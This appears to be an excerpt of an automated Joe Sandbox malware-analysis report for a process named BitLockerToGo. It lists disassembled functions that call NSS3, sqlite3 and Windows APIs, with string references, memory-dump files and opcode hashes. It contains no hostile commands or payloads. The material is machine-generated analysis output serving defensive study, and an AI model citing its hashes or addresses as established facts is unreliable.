                                                                                                                                                      • Instruction ID: 52124bf1e097053479516b2cf9bc5fda717b924ca750d1c8f71601a2fbeaae46
                                                                                                                                                      • Opcode Fuzzy Hash: 533b854510614b815c8c31c7afcd793e703d070563f37560cebce20b4612e8cc
                                                                                                                                                      • Instruction Fuzzy Hash: 3201D2B5A00214BBDF11AFA8DC65CAB3F3CEF46368F088025FD0987711D635E99187A2
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C82AB89: EnterCriticalSection.KERNEL32(6C87E370,?,?,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB94
                                                                                                                                                        • Part of subcall function 6C82AB89: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82ABD1
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                      Strings
                                                                                                                                                      • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C83946B
                                                                                                                                                      • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C839459
                                                                                                                                                      • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C83947D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                      • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                      • API String ID: 4042361484-1628757462
                                                                                                                                                      • Opcode ID: 98a78bd905fd798e0151342bc583586cced74e7e9dff3cd46fca7a08010ffbd8
                                                                                                                                                      • Instruction ID: 1a2b98cb1328874e2cf5112d36d6c87a57bdf5c01f478ad6c625bfc2d2d37d48
                                                                                                                                                      • Opcode Fuzzy Hash: 98a78bd905fd798e0151342bc583586cced74e7e9dff3cd46fca7a08010ffbd8
                                                                                                                                                      • Instruction Fuzzy Hash: D601B570A001218BD7309B9DDB1DA8F32B5AB0636CF041D36D90EC7B51FA25D4A4CAFA
                                                                                                                                                      APIs
                                                                                                                                                      • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C9E4DC3
                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9E4DE0
                                                                                                                                                      Strings
                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C9E4DDA
                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9E4DCB
                                                                                                                                                      • invalid, xrefs: 6C9E4DB8
                                                                                                                                                      • misuse, xrefs: 6C9E4DD5
                                                                                                                                                      • API call with %s database connection pointer, xrefs: 6C9E4DBD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                      • API String ID: 632333372-2974027950
                                                                                                                                                      • Opcode ID: 475650e4ddd1eab8da8279cf870205f30ff1cdceac272b9be6f78a0a36811b57
                                                                                                                                                      • Instruction ID: c55416ed1610a9e98a11b27a736fb8ce22e803ff49aca6a9a5afad26c9cedbfa
                                                                                                                                                      • Opcode Fuzzy Hash: 475650e4ddd1eab8da8279cf870205f30ff1cdceac272b9be6f78a0a36811b57
                                                                                                                                                      • Instruction Fuzzy Hash: 32F0B421F146647FDB024195CD11F8637AD6F29319F4649E0EE046BA52E215F8D096A1
                                                                                                                                                      APIs
                                                                                                                                                      • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C9E4E30
                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9E4E4D
                                                                                                                                                      Strings
                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C9E4E47
                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9E4E38
                                                                                                                                                      • invalid, xrefs: 6C9E4E25
                                                                                                                                                      • misuse, xrefs: 6C9E4E42
                                                                                                                                                      • API call with %s database connection pointer, xrefs: 6C9E4E2A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                      • API String ID: 632333372-2974027950
                                                                                                                                                      • Opcode ID: 5f8b3ba05f3992f1a16bf23111ed031a54026f3526c36267581c5875f9241800
                                                                                                                                                      • Instruction ID: f6f6968c54411eeb386336f7e3e00b04cfccb0965802fe822d1f6b297755ee4e
                                                                                                                                                      • Opcode Fuzzy Hash: 5f8b3ba05f3992f1a16bf23111ed031a54026f3526c36267581c5875f9241800
                                                                                                                                                      • Instruction Fuzzy Hash: 6CF0E211F449287FEB1241A59C10F82379A6F29329F49C9B5EA0867F92D205D8A046A2
                                                                                                                                                      APIs
                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000,6C951444,?,00000001,?,00000000,00000000,?,?,6C951444,?,?,00000000,?,?), ref: 6C950CB3
                                                                                                                                                        • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                      • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?,?,6C951444,?), ref: 6C950DC1
                                                                                                                                                      • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?,?,6C951444,?), ref: 6C950DEC
                                                                                                                                                        • Part of subcall function 6C970F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C912AF5,?,?,?,?,?,6C910A1B,00000000), ref: 6C970F1A
                                                                                                                                                        • Part of subcall function 6C970F10: malloc.MOZGLUE(00000001), ref: 6C970F30
                                                                                                                                                        • Part of subcall function 6C970F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C970F42
                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?), ref: 6C950DFF
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C951444,?,00000001,?,00000000), ref: 6C950E16
                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?), ref: 6C950E53
                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?,?,6C951444,?,?,00000000), ref: 6C950E65
                                                                                                                                                      • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?), ref: 6C950E79
                                                                                                                                                        • Part of subcall function 6C961560: TlsGetValue.KERNEL32(00000000,?,6C930844,?), ref: 6C96157A
                                                                                                                                                        • Part of subcall function 6C961560: EnterCriticalSection.KERNEL32(?,?,?,6C930844,?), ref: 6C96158F
                                                                                                                                                        • Part of subcall function 6C961560: PR_Unlock.NSS3(?,?,?,?,6C930844,?), ref: 6C9615B2
                                                                                                                                                        • Part of subcall function 6C92B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C931397,00000000,?,6C92CF93,5B5F5EC0,00000000,?,6C931397,?), ref: 6C92B1CB
                                                                                                                                                        • Part of subcall function 6C92B1A0: free.MOZGLUE(5B5F5EC0,?,6C92CF93,5B5F5EC0,00000000,?,6C931397,?), ref: 6C92B1D2
                                                                                                                                                        • Part of subcall function 6C9289E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C9288AE,-00000008), ref: 6C928A04
                                                                                                                                                        • Part of subcall function 6C9289E0: EnterCriticalSection.KERNEL32(?), ref: 6C928A15
                                                                                                                                                        • Part of subcall function 6C9289E0: memset.VCRUNTIME140(6C9288AE,00000000,00000132), ref: 6C928A27
                                                                                                                                                        • Part of subcall function 6C9289E0: PR_Unlock.NSS3(?), ref: 6C928A35
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1601681851-0
                                                                                                                                                      • Opcode ID: ced1eb6228c19fc65b7f57754a1cf9e45fcb0e62ed118e2b7732649c44a3033e
                                                                                                                                                      • Instruction ID: cf2f777c39854f09cefe5958d308de5723f59690eff178c086f75dd6d10b353b
                                                                                                                                                      • Opcode Fuzzy Hash: ced1eb6228c19fc65b7f57754a1cf9e45fcb0e62ed118e2b7732649c44a3033e
                                                                                                                                                      • Instruction Fuzzy Hash: 5751BAB6E002115FEB00DF64EC41ABB37ACEF6521CF555024EC0997B12F735ED2986A2
                                                                                                                                                      APIs
                                                                                                                                                      • sqlite3_value_text.NSS3(?,?), ref: 6C906ED8
                                                                                                                                                      • sqlite3_value_text.NSS3(?,?), ref: 6C906EE5
                                                                                                                                                      • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C906FA8
                                                                                                                                                      • sqlite3_value_text.NSS3(00000000,?), ref: 6C906FDB
                                                                                                                                                      • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C906FF0
                                                                                                                                                      • sqlite3_value_blob.NSS3(?,?), ref: 6C907010
                                                                                                                                                      • sqlite3_value_blob.NSS3(?,?), ref: 6C90701D
                                                                                                                                                      • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C907052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1920323672-0
                                                                                                                                                      • Opcode ID: 537b83b6209f8a67fa338b27772b2b1de8fd8f340662f8e2a94540c7ea8be937
                                                                                                                                                      • Instruction ID: 3a1178c63b3fddcdccb07a8c3e2970171bd3ef5dbc864b3be9388c32b234f010
                                                                                                                                                      • Opcode Fuzzy Hash: 537b83b6209f8a67fa338b27772b2b1de8fd8f340662f8e2a94540c7ea8be937
                                                                                                                                                      • Instruction Fuzzy Hash: B761C0B1F042068BDB00CFA8C9007EEB7B6AF55318F28416CD914AB751E736DD65CBA0
                                                                                                                                                      APIs
                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C977313), ref: 6C978FBB
                                                                                                                                                        • Part of subcall function 6C9707B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C918298,?,?,?,6C90FCE5,?), ref: 6C9707BF
                                                                                                                                                        • Part of subcall function 6C9707B0: PL_HashTableLookup.NSS3(?,?), ref: 6C9707E6
                                                                                                                                                        • Part of subcall function 6C9707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C97081B
                                                                                                                                                        • Part of subcall function 6C9707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C970825
                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C977313), ref: 6C979012
                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C977313), ref: 6C97903C
                                                                                                                                                      • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C977313), ref: 6C97909E
                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C977313), ref: 6C9790DB
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C977313), ref: 6C9790F1
                                                                                                                                                        • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                        • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                        • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                        • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                        • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C977313), ref: 6C97906B
                                                                                                                                                        • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C977313), ref: 6C979128
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3590961175-0
                                                                                                                                                      • Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                                                      • Instruction ID: c1139a484d927d77cae3462cde39b448fb7e106d361ebb172e7d8b44d26fc6ec
                                                                                                                                                      • Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                                                      • Instruction Fuzzy Hash: 4F517071B02201CBEB209F6ADC48B26B3F9EF54318F164069D915D7B61EB32E914CBB1
                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C934E90
                                                                                                                                                      • EnterCriticalSection.KERNEL32 ref: 6C934EA9
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C934EC6
                                                                                                                                                      • EnterCriticalSection.KERNEL32 ref: 6C934EDF
                                                                                                                                                      • PL_HashTableLookup.NSS3 ref: 6C934EF8
                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C934F05
                                                                                                                                                      • PR_Now.NSS3 ref: 6C934F13
                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C934F3A
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007AD
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007CD
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007D6
                                                                                                                                                        • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C89204A), ref: 6C9007E4
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,6C89204A), ref: 6C900864
                                                                                                                                                        • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C900880
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,6C89204A), ref: 6C9008CB
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008D7
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008FB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 326028414-0
                                                                                                                                                      • Opcode ID: f6cb53fac3de8fb5a7cde773dc812bd242c261d69fdcee17dfcbcd3fb31551af
                                                                                                                                                      • Instruction ID: 8e255cc0a956f4bf2f28bf9b1dc248ddef1d57b0fe94e6e10d9f2c67c3557016
                                                                                                                                                      • Opcode Fuzzy Hash: f6cb53fac3de8fb5a7cde773dc812bd242c261d69fdcee17dfcbcd3fb31551af
                                                                                                                                                      • Instruction Fuzzy Hash: 73413AB4A007159FCB04EF69C4848AABBF4FF59308B06C569EC899B710EB30E855CF91
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __allrem
                                                                                                                                                      • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                                                                                                      • API String ID: 2933888876-3221253098
                                                                                                                                                      • Opcode ID: 769ee00e2dd405ace950cdc47976f6cd1b4ab156232224aadb57eb1f27a00c63
                                                                                                                                                      • Instruction ID: 8a686edc4fc1c26b5f8c948f298fa44f3d3ab4150633bd3522eac4c804b0e3bb
                                                                                                                                                      • Opcode Fuzzy Hash: 769ee00e2dd405ace950cdc47976f6cd1b4ab156232224aadb57eb1f27a00c63
                                                                                                                                                      • Instruction Fuzzy Hash: 92617B75B407059FDB08CF68DC88A6A7BB5FF59354F10822CEA169B790DB31E806CB90
                                                                                                                                                      APIs
                                                                                                                                                      • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C95AB3E,?,?,?), ref: 6C95AC35
                                                                                                                                                        • Part of subcall function 6C93CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C93CF16
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C95AB3E,?,?,?), ref: 6C95AC55
                                                                                                                                                        • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                        • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                        • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                        • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                        • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                      • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C95AB3E,?,?), ref: 6C95AC70
                                                                                                                                                        • Part of subcall function 6C93E300: TlsGetValue.KERNEL32 ref: 6C93E33C
                                                                                                                                                        • Part of subcall function 6C93E300: EnterCriticalSection.KERNEL32(?), ref: 6C93E350
                                                                                                                                                        • Part of subcall function 6C93E300: PR_Unlock.NSS3(?), ref: 6C93E5BC
                                                                                                                                                        • Part of subcall function 6C93E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C93E5CA
                                                                                                                                                        • Part of subcall function 6C93E300: TlsGetValue.KERNEL32 ref: 6C93E5F2
                                                                                                                                                        • Part of subcall function 6C93E300: EnterCriticalSection.KERNEL32(?), ref: 6C93E606
                                                                                                                                                        • Part of subcall function 6C93E300: PORT_Alloc_Util.NSS3(?), ref: 6C93E613
                                                                                                                                                      • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C95AC92
                                                                                                                                                      • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C95AB3E), ref: 6C95ACD7
                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6C95AD10
                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C95AD2B
                                                                                                                                                        • Part of subcall function 6C93F360: TlsGetValue.KERNEL32(00000000,?,6C95A904,?), ref: 6C93F38B
                                                                                                                                                        • Part of subcall function 6C93F360: EnterCriticalSection.KERNEL32(?,?,?,6C95A904,?), ref: 6C93F3A0
                                                                                                                                                        • Part of subcall function 6C93F360: PR_Unlock.NSS3(?,?,?,?,6C95A904,?), ref: 6C93F3D3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
